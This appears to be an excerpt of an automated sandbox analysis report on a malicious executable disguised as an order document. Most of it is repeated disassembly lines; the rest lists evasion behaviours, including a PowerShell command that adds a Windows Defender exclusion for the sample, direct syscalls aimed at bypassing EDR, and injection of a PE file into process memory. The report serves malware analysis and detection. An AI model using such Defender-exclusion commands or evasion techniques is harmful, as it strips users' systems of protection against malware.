            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143E872 mov eax, dword ptr fs:[00000030h]5_2_0143E872
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01446870 mov eax, dword ptr fs:[00000030h]5_2_01446870
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01446870 mov eax, dword ptr fs:[00000030h]5_2_01446870
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143C810 mov eax, dword ptr fs:[00000030h]5_2_0143C810
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4859 mov eax, dword ptr fs:[00000030h]5_2_013B4859
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4859 mov eax, dword ptr fs:[00000030h]5_2_013B4859
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E0854 mov eax, dword ptr fs:[00000030h]5_2_013E0854
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C2840 mov ecx, dword ptr fs:[00000030h]5_2_013C2840
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145483A mov eax, dword ptr fs:[00000030h]5_2_0145483A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145483A mov eax, dword ptr fs:[00000030h]5_2_0145483A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014808C0 mov eax, dword ptr fs:[00000030h]5_2_014808C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147A8E4 mov eax, dword ptr fs:[00000030h]5_2_0147A8E4
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0887 mov eax, dword ptr fs:[00000030h]5_2_013B0887
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC8F9 mov eax, dword ptr fs:[00000030h]5_2_013EC8F9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC8F9 mov eax, dword ptr fs:[00000030h]5_2_013EC8F9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143C89D mov eax, dword ptr fs:[00000030h]5_2_0143C89D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE8C0 mov eax, dword ptr fs:[00000030h]5_2_013DE8C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01446B40 mov eax, dword ptr fs:[00000030h]5_2_01446B40
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01446B40 mov eax, dword ptr fs:[00000030h]5_2_01446B40
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147AB40 mov eax, dword ptr fs:[00000030h]5_2_0147AB40
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01458B42 mov eax, dword ptr fs:[00000030h]5_2_01458B42
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01464B4B mov eax, dword ptr fs:[00000030h]5_2_01464B4B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01464B4B mov eax, dword ptr fs:[00000030h]5_2_01464B4B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145EB50 mov eax, dword ptr fs:[00000030h]5_2_0145EB50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DEB20 mov eax, dword ptr fs:[00000030h]5_2_013DEB20
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DEB20 mov eax, dword ptr fs:[00000030h]5_2_013DEB20
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013ACB7E mov eax, dword ptr fs:[00000030h]5_2_013ACB7E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142EB1D mov eax, dword ptr fs:[00000030h]5_2_0142EB1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01478B28 mov eax, dword ptr fs:[00000030h]5_2_01478B28
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01478B28 mov eax, dword ptr fs:[00000030h]5_2_01478B28
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0BBE mov eax, dword ptr fs:[00000030h]5_2_013C0BBE
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0BBE mov eax, dword ptr fs:[00000030h]5_2_013C0BBE
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145EBD0 mov eax, dword ptr fs:[00000030h]5_2_0145EBD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143CBF0 mov eax, dword ptr fs:[00000030h]5_2_0143CBF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DEBFC mov eax, dword ptr fs:[00000030h]5_2_013DEBFC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8BF0 mov eax, dword ptr fs:[00000030h]5_2_013B8BF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8BF0 mov eax, dword ptr fs:[00000030h]5_2_013B8BF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8BF0 mov eax, dword ptr fs:[00000030h]5_2_013B8BF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D0BCB mov eax, dword ptr fs:[00000030h]5_2_013D0BCB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D0BCB mov eax, dword ptr fs:[00000030h]5_2_013D0BCB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D0BCB mov eax, dword ptr fs:[00000030h]5_2_013D0BCB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0BCD mov eax, dword ptr fs:[00000030h]5_2_013B0BCD
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0BCD mov eax, dword ptr fs:[00000030h]5_2_013B0BCD
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0BCD mov eax, dword ptr fs:[00000030h]5_2_013B0BCD
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01464BB0 mov eax, dword ptr fs:[00000030h]5_2_01464BB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01464BB0 mov eax, dword ptr fs:[00000030h]5_2_01464BB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013ECA38 mov eax, dword ptr fs:[00000030h]5_2_013ECA38
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D4A35 mov eax, dword ptr fs:[00000030h]5_2_013D4A35
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D4A35 mov eax, dword ptr fs:[00000030h]5_2_013D4A35
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DEA2E mov eax, dword ptr fs:[00000030h]5_2_013DEA2E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013ECA24 mov eax, dword ptr fs:[00000030h]5_2_013ECA24
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145EA60 mov eax, dword ptr fs:[00000030h]5_2_0145EA60
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142CA72 mov eax, dword ptr fs:[00000030h]5_2_0142CA72
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142CA72 mov eax, dword ptr fs:[00000030h]5_2_0142CA72
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013ECA6F mov eax, dword ptr fs:[00000030h]5_2_013ECA6F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013ECA6F mov eax, dword ptr fs:[00000030h]5_2_013ECA6F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013ECA6F mov eax, dword ptr fs:[00000030h]5_2_013ECA6F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143CA11 mov eax, dword ptr fs:[00000030h]5_2_0143CA11
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0A5B mov eax, dword ptr fs:[00000030h]5_2_013C0A5B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0A5B mov eax, dword ptr fs:[00000030h]5_2_013C0A5B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6A50 mov eax, dword ptr fs:[00000030h]5_2_013B6A50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6A50 mov eax, dword ptr fs:[00000030h]5_2_013B6A50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6A50 mov eax, dword ptr fs:[00000030h]5_2_013B6A50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6A50 mov eax, dword ptr fs:[00000030h]5_2_013B6A50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6A50 mov eax, dword ptr fs:[00000030h]5_2_013B6A50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6A50 mov eax, dword ptr fs:[00000030h]5_2_013B6A50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6A50 mov eax, dword ptr fs:[00000030h]5_2_013B6A50
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01406ACC mov eax, dword ptr fs:[00000030h]5_2_01406ACC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01406ACC mov eax, dword ptr fs:[00000030h]5_2_01406ACC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01406ACC mov eax, dword ptr fs:[00000030h]5_2_01406ACC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8AA0 mov eax, dword ptr fs:[00000030h]5_2_013B8AA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8AA0 mov eax, dword ptr fs:[00000030h]5_2_013B8AA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8A90 mov edx, dword ptr fs:[00000030h]5_2_013E8A90
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA80 mov eax, dword ptr fs:[00000030h]5_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484A80 mov eax, dword ptr fs:[00000030h]5_2_01484A80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EAAEE mov eax, dword ptr fs:[00000030h]5_2_013EAAEE
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EAAEE mov eax, dword ptr fs:[00000030h]5_2_013EAAEE
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01406AA4 mov eax, dword ptr fs:[00000030h]5_2_01406AA4
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0AD0 mov eax, dword ptr fs:[00000030h]5_2_013B0AD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E4AD0 mov eax, dword ptr fs:[00000030h]5_2_013E4AD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E4AD0 mov eax, dword ptr fs:[00000030h]5_2_013E4AD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E4D1D mov eax, dword ptr fs:[00000030h]5_2_013E4D1D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A6D10 mov eax, dword ptr fs:[00000030h]5_2_013A6D10
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A6D10 mov eax, dword ptr fs:[00000030h]5_2_013A6D10
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A6D10 mov eax, dword ptr fs:[00000030h]5_2_013A6D10
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01448D6B mov eax, dword ptr fs:[00000030h]5_2_01448D6B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CAD00 mov eax, dword ptr fs:[00000030h]5_2_013CAD00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CAD00 mov eax, dword ptr fs:[00000030h]5_2_013CAD00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CAD00 mov eax, dword ptr fs:[00000030h]5_2_013CAD00
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory written: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
